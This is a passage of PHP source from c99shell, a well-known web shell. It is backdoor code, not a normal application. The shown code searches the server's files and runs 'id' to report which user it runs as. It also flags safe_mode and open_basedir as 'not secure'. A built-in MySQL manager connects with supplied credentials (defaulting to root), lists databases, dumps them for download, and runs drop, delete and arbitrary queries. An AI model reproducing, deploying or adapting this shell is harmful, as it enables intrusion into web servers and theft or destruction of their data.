  729. $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
  730. if (is_dir($d.$f))
  731. {
  732. $search_i_d++;
  733. if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  734. if (!is_link($d.$f)) {c99fsearch($d.$f);}
  735. }
  736. else
  737. {
  738. $search_i_f++;
  739. if ($bool)
  740. {
  741. if (!empty($a["text"]))
  742. {
  743. $r = @file_get_contents($d.$f);
  744. if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  745. if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  746. if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  747. else {$bool = strpos(" ".$r,$a["text"],1);}
  748. if ($a["text_not"]) {$bool = !$bool;}
  749. if ($bool) {$found[] = $d.$f; $found_f++;}
  750. }
  751. else {$found[] = $d.$f; $found_f++;}
  752. }
  753. }
  754. }
  755. }
  756. closedir($h);
  757. }
  758. }
  759. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  760. //Sending headers
  761. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  762. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  763. header("Cache-Control: no-store, no-cache, must-revalidate");
  764. header("Cache-Control: post-check=0, pre-check=0", false);
  765. header("Pragma: no-cache");
  766. if (empty($tmpdir))
  767. {
  768. if (!$win) {$tmpdir = "/tmp/";}
  769. else {$tmpdir = getenv("SystemRoot");}
  770. }
  771. else {$tmpdir = realpath($tmpdir);}
  772. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  773. if (substr($tmpdir,-1,1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  774. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  775. else {$tmpdir_logs = realpath($tmpdir_logs);}
  776. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  777. {
  778. $safemode = true;
  779. $hsafemode = "<font color=\"red\">ON (secure)</font>";
  780. }
  781. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  782. $v = @ini_get("open_basedir");
  783. if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
  784. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  785. $sort = htmlspecialchars($sort);
  786. if (empty($sort)) {$sort = $sort_default;}
  787. $sort[1] = strtolower($sort[1]);
  788. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  789. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  790. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  791. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  792. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  793. @ini_set("highlight.default",$highlight_default); //#0000BB
  794. @ini_set("highlight.html",$highlight_html); //#000000
  795. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  796. @ini_set("highlight.string",$highlight_string); //#DD0000
  797. if (!is_array($actbox)) {$actbox = array();}
  798. $dspact = $act = htmlspecialchars($act);
  799. $disp_fullpath = $ls_arr = $notls = null;
  800. $ud = urlencode($d);
  801. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><link rel="shortcut icon" href="" type="image/x-icon"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  802. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  803. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  804. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  805. if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  806. $d = str_replace("\\\\","\\",$d);
  807. $dispd = htmlspecialchars($d);
  808. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,strlen($d)-1));
  809. $i = 0;
  810. foreach($pd as $b)
  811. {
  812. $t = "";
  813. reset($e);
  814. $j = 0;
  815. foreach ($e as $r)
  816. {
  817. $t.= $r.DIRECTORY_SEPARATOR;
  818. if ($j == $i) {break;}
  819. $j++;
  820. }
  821. echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  822. $i++;
  823. }
  824. echo "&nbsp;&nbsp;&nbsp;";
  825. if (is_writable($d))
  826. {
  827. $wd = true;
  828. $wdt = "<font color=\"green\">[ ok ]</font>";
  829. echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
  830. }
  831. else
  832. {
  833. $wd = false;
  834. $wdt = "<font color=\"red\">[ Read-Only ]</font>";
  835. echo "<b>".view_perms_color($d)."</b>";
  836. }
  837. if (is_callable("disk_free_space"))
  838. {
  839. $free = disk_free_space($d);
  840. $total = disk_total_space($d);
  841. if ($free === false) {$free = 0;}
  842. if ($total === false) {$total = 0;}
  843. if ($free < 0) {$free = 0;}
  844. if ($total < 0) {$total = 0;}
  845. $used = $total-$free;
  846. $free_percent = round(100/($total/$free),2);
  847. echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  848. }
  849. echo "<br>";
  850. $letters = "";
  851. if ($win)
  852. {
  853. $v = explode("\\",$d);
  854. $v = $v[0];
  855. foreach (range("a","z") as $letter)
  856. {
  857. $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  858. if (!$bool) {$bool = is_dir($letter.":\\");}
  859. if ($bool)
  860. {
  861. $letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\\\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  862. if ($letter.":" != $v) {$letters .= $letter;}
  863. else {$letters .= "<font color=\"green\">".$letter."</font>";}
  864. $letters .= " ]</a> ";
  865. }
  866. }
  867. if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  868. }
  869. if (count($quicklaunch) > 0)
  870. {
  871. foreach($quicklaunch as $item)
  872. {
  873. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  874. $item[1] = str_replace("%sort",$sort,$item[1]);
  875. $v = realpath($d."..");
  876. if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  877. $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  878. echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  879. }
  880. }
  881. ?></p></td></tr></table><br><?php
  882. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php }
  883. ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
  884. if ($act == "") {$act = $dspact = "ls";}
  885. if ($act == "sql")
  886. {
  887. $sql_surl = $surl."act=sql";
  888. if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  889. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  890. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  891. if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  892. if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  893. $sql_surl .= "&";
  894. ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  895. if ($sql_server)
  896. {
  897. $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  898. $err = mysql_smarterror();
  899. @mysql_select_db($sql_db,$sql_sock);
  900. if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  901. }
  902. else {$sql_sock = false;}
  903. echo "<b>SQL Manager:</b><br>";
  904. if (!$sql_sock)
  905. {
  906. if (!$sql_server) {echo "NO CONNECTION";}
  907. else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  908. }
  909. else
  910. {
  911. $sqlquicklaunch = array();
  912. $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  913. $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  914. $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  915. $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  916. $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  917. $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  918. echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  919. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  920. echo "</center>";
  921. }
  922. echo "</td></tr><tr>";
  923. if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  924. else
  925. {
  926. //Start left panel
  927. if (!empty($sql_db))
  928. {
  929. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  930. $result = mysql_list_tables($sql_db);
  931. if (!$result) {echo mysql_smarterror();}
  932. else
  933. {
  934. echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  935. $c = 0;
  936. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  937. if (!$c) {echo "No tables found in database.";}
  938. }
  939. }
  940. else
  941. {
  942. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  943. $result = mysql_list_dbs($sql_sock);
  944. if (!$result) {echo mysql_smarterror();}
  945. else
  946. {
  947. ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  948. $c = 0;
  949. $dbs = "";
  950. while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  951. echo "<option value=\"\">Databases (".$c.")</option>";
  952. echo $dbs;
  953. }
  954. ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  955. }
  956. //End left panel
  957. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  958. //Start center panel
  959. $diplay = true;
  960. if ($sql_db)
  961. {
  962. if (!is_numeric($c)) {$c = 0;}
  963. if ($c == 0) {$c = "no";}
  964. echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  965. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  966. echo "</b></center>";
  967. $acts = array("","dump");
  968. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  969. elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  970. elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  971. elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  972. elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  973. elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  974. elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
  975. elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,strlen($sql_query)-1);} $sql_act = "query";}
  976. elseif ($sql_tbl_act == "insert")
  977. {
  978. if ($sql_tbl_insert_radio == 1)
  979. {
  980. $keys = "";
  981. $akeys = array_keys($sql_tbl_insert);
  982. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  983. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  984. $values = "";
  985. $i = 0;
  986. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  987. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  988. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  989. $sql_act = "query";
  990. $sql_tbl_act = "browse";
  991. }
  992. elseif ($sql_tbl_insert_radio == 2)
  993. {
  994. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  995. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  996. $result = mysql_query($sql_query) or print(mysql_smarterror());
  997. $result = mysql_fetch_array($result, MYSQL_ASSOC);
  998. $sql_act = "query";
  999. $sql_tbl_act = "browse";
  1000. }
  1001. }
  1002. if ($sql_act == "query")
  1003. {
  1004. echo "<hr size=\"1\" noshade>";
  1005. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1006. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1007. if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1008. }
  1009. if (in_array($sql_act,$acts))
  1010. {
  1011. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1012. if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1013. if ($sql_act == "newtbl")
  1014. {
  1015. echo "<b>";
  1016. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1017. }
  1018. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1019. }
  1020. elseif ($sql_act == "dump")
  1021. {
  1022. if (empty($submit))
  1023. {
  1024. $diplay = false;
  1025. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1026. echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1027. $v = join (";",$dmptbls);
  1028. echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1029. if ($dump_file) {$tmp = $dump_file;}
  1030. else {$tmp = htmlspecialchars("./dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1031. echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1032. echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1033. echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1034. echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1035. echo "</form>";
  1036. }
  1037. else
  1038. {
  1039. $diplay = true;
  1040. $set = array();
  1041. $set["sock"] = $sql_sock;
  1042. $set["db"] = $sql_db;
  1043. $dump_out = "download";
  1044. $set["print"] = 0;
  1045. $set["nl2br"] = 0;
  1046. $set[""] = 0;
  1047. $set["file"] = $dump_file;
  1048. $set["add_drop"] = true;
  1049. $set["onlytabs"] = array();
  1050. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1051. $ret = mysql_dump($set);
  1052. if ($sql_dump_download)
  1053. {
  1054. @ob_clean();
  1055. header("Content-type: application/octet-stream");
  1056. header("Content-length: ".strlen($ret));
  1057. header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1058. echo $ret;
  1059. exit;
  1060. }
  1061. elseif ($sql_dump_savetofile)
  1062. {
  1063. $fp = fopen($sql_dump_file,"w");
  1064. if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1065. else
  1066. {
  1067. fwrite($fp,$ret);
  1068. fclose($fp);
  1069. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1070. }
  1071. }
  1072. else {echo "<b>Dump: nothing to do!</b>";}
  1073. }
  1074. }
  1075. if ($diplay)
  1076. {
  1077. if (!empty($sql_tbl))
  1078. {
  1079. if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1080. $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1081. $count_row = mysql_fetch_array($count);
  1082. mysql_free_result($count);
  1083. $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1084. $tbl_struct_fields = array();
  1085. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1086. if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1087. if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1088. if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1089. if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1090. $perpage = $sql_tbl_le - $sql_tbl_ls;
  1091. if (!is_numeric($perpage)) {$perpage = 10;}
  1092. $numpages = $count_row[0]/$perpage;
  1093. $e = explode(" ",$sql_order);
  1094. if (count($e) == 2)
  1095. {
  1096. if ($e[0] == "d") {$asc_desc = "DESC";}
  1097. else {$asc_desc = "ASC";}
  1098. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1099. }
  1100. else {$v = "";}
  1101. $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1102. $result = mysql_query($query) or print(mysql_smarterror());
  1103. echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1104. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
